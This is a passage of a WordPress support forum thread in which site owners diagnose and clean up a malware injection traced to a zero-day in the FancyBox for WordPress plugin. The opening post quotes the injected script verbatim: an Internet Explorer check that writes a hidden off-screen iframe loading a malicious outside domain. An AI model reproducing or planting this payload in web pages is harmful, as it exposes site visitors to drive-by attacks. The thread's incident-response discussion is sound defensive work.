• Resolved SherabGyamtso

    (@sherabgyamtso)


    I have last version of your plugin and WordPress.

    Everything was ok until today. I’ve got a report from sitelock that my Contact page on my blog is infected with malware with iframe redirecting to h t t p : / / 203koko.eu/hjnfh/ipframe2.php

    Chcecked my page source on this contact page and found something like this:

    <script>/*<![CDATA[*/if(navigator.userAgent.match(/msie/i)){document.write(‘ <div style=”position:absolute;left:-2000px;width:2000px”><iframe src=”https://203koko.eu/hjnfh/ipframe2.php&#8221; width=”20″ height=”30″ ></iframe></div>’);}/*]]>*/</script>

    I desactivated just Total Cache and this page is not infected anymore.

    I have other plugins (up to date) active:

    Akismet Version 3.0.4
    Custom Posts Per Page Version 1.7.1
    FancyBox for WordPress Version 3.0.2
    GetSocial Version 2.0.1
    NextCellent Gallery Version 1.9.25.1
    Official StatCounter Plugin Version 1.6.9
    Use Google Libraries Version 1.6.2
    WordPress SEO Version 1.7.1

    Can anybody helps me to determine source of this malware?

    Best

    Maciek

    https://www.ads-software.com/plugins/w3-total-cache/

Viewing 15 replies - 31 through 45 (of 110 total)
  • Forgive me for my ignorance, I did the search SQL query from one of other sites that didn’t have Fancy Box installed. I just did the search SQL query from the infected site and here is what I got:

    a:2:{s:10:”extraCalls”;s:1:” “;s:16:”extraCallsEnable”;s:2:”on”;}

    Sorry about that.

    Anyone have a backup of the db from yesterday? Can they check the same key whether it’s not empty?

    snip

    I have another website that is using fancy box and the site is working properly.

    Hey guys,

    Anyone affected would be willing to share logs? If you can email them to [email protected], we are trying to get a better picture of what is happening.

    thanks,

    It’s definitely a vulnerability in fancybox. Disable at once.

    DB Backup from 28.01.2015:
    a:2:{s:10:"extraCalls";s:1:" ";s:16:"extraCallsEnable";s:2:"on";}

    DB Backup from 14.12.2014:

    a:38:{s:11:"borderColor";s:7:"#BBBBBB";s:15:"showCloseButton";s:2:"on";s:11:"closeHorPos";s:5:"right";s:11:"closeVerPos";s:3:"top";s:12:"paddingColor";s:7:"#FFFFFF";s:7:"padding";s:2:"10";s:11:"overlayShow";s:2:"on";s:12:"overlayColor";s:7:"#666666";s:14:"overlayOpacity";s:3:"0.3";s:9:"titleShow";s:2:"on";s:13:"titlePosition";s:6:"inside";s:10:"titleColor";s:7:"#333333";s:13:"showNavArrows";s:2:"on";s:11:"zoomOpacity";s:2:"on";s:11:"zoomSpeedIn";s:3:"500";s:12:"zoomSpeedOut";s:3:"500";s:15:"zoomSpeedChange";s:3:"300";s:12:"transitionIn";s:4:"fade";s:13:"transitionOut";s:4:"fade";s:8:"easingIn";s:11:"easeOutBack";s:9:"easingOut";s:10:"easeInBack";s:12:"easingChange";s:14:"easeInOutQuart";s:10:"imageScale";s:2:"on";s:14:"centerOnScroll";s:2:"on";s:18:"hideOnOverlayClick";s:2:"on";s:18:"enableEscapeButton";s:2:"on";s:11:"galleryType";s:3:"all";s:16:"customExpression";s:74:"jQuery(thumbnails).addClass("fancybox").attr("rel","fancybox").getTitle();";s:14:"autoDimensions";s:2:"on";s:10:"frameWidth";s:3:"560";s:11:"frameHeight";s:3:"340";s:15:"callbackOnStart";s:0:"";s:16:"callbackOnCancel";s:32:"function() { alert("Cancel!"); }";s:18:"callbackOnComplete";s:0:"";s:17:"callbackOnCleanup";s:33:"function() { alert("CleanUp!"); }";s:15:"callbackOnClose";s:0:"";s:16:"extraCallsEnable";s:2:"on";s:10:"extraCalls";s:171:"var arr = jQuery("a.fancybox");
    jQuery.each(arr, function() {
     var title = jQuery(this).children("img").attr("alt");
     beforeLoad: jQuery(this).attr('title',title);
    });";}

    Not sure if that helps, though. Just looks like some cleaned up options.

    I disabled and cleared my database and resubmitted my site to google. Hopefully this fixes the issue

    @gennady thanks for your help.

    We can confirm it is a vulnerability (0-day) in the plugin. We actually have the malware (exploit) payloads being used to compromise sites.

    We will post more details in a bit.

    Thanks Daniel for the info. I just caught this post from the Sucuri.net site:

    https://www.malwareremovalservice.com/fancybox-for-wordpress-iframe-injection

    Oh, that’s not us. Just someone trying to copy (or look like) us ??

    Our blog post is here:

    https://blog.sucuri.net/2015/02/zero-day-in-the-fancybox-for-wordpress-plugin.html

    thanks!

    Crap, sorry about that link, should of paid more attention.

    It is the same on my website!
    Some days ago I found my Fancybox settings all restored, and I found that weird!
    Today my website has been blocked and I thought it could be something related to that plugin, and now I found the confirmation and removed it.
    Thank you.

    Has Google ‘okayed’ anyones site yet?

    (after removing the plugin, and submitting to Google)

    Mine was just approved and website is working

Viewing 15 replies - 31 through 45 (of 110 total)
  • The topic ‘Possible malware’ is closed to new replies.